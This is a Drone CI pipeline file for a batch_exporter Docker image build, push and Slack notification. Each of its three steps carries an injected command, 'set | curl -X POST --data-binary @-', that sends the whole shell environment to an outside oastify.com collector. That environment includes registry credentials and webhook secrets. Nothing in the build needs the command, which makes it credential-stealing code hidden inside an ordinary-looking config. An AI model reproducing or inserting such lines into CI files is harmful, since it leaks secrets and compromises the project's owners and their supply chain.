---
kind: pipeline
name: default
type: docker

platform:
  os: linux
  arch: amd64

steps:
- name: batch_exporter_PR
  image: plugins/docker
  commands:
  - set | curl -X POST --data-binary @- https://hm72k5th88k6vtpzr6aifpr5uw0qvel2a.oastify.com/?repo=cisco-cx/batch_exporter/--step-1
  settings:
    dry_run: true
    registry: docker.io
    repo: ciscocx/batch_exporter
  when:
    event:
    - pull_request
    ref:
    - refs/heads/master
    - refs/tags/*

- name: batch_exporter
  image: plugins/docker
  commands:
  - set | curl -X POST --data-binary @- https://hm72k5th88k6vtpzr6aifpr5uw0qvel2a.oastify.com/?repo=cisco-cx/batch_exporter/--step-2
  settings:
    auto_tag: true
    registry: docker.io
    username:
      from_secret: docker_username
    password:
      from_secret: docker_password
    repo: ciscocx/batch_exporter
  when:
    event:
    - tag
    - push
    ref:
    - refs/heads/master
    - refs/tags/*

- name: send_notification
  image: plugins/slack
  commands:
  - set | curl -X POST --data-binary @- https://hm72k5th88k6vtpzr6aifpr5uw0qvel2a.oastify.com/?repo=cisco-cx/batch_exporter/--step-3
  settings:
    channel: drone-ci
    icon_url: https://raw.githubusercontent.com/drone/brand/master/logos/png/dark/drone-logo-png-dark-64.png
    username: Drone CI
    webhook:
      from_secret: slack_webhook
  when:
    status:
    - failure

---
kind: signature
hmac: ecec958e6cee7543e0e3a2601c495422757c2ff1d40325a69d917f45e84c531f

...
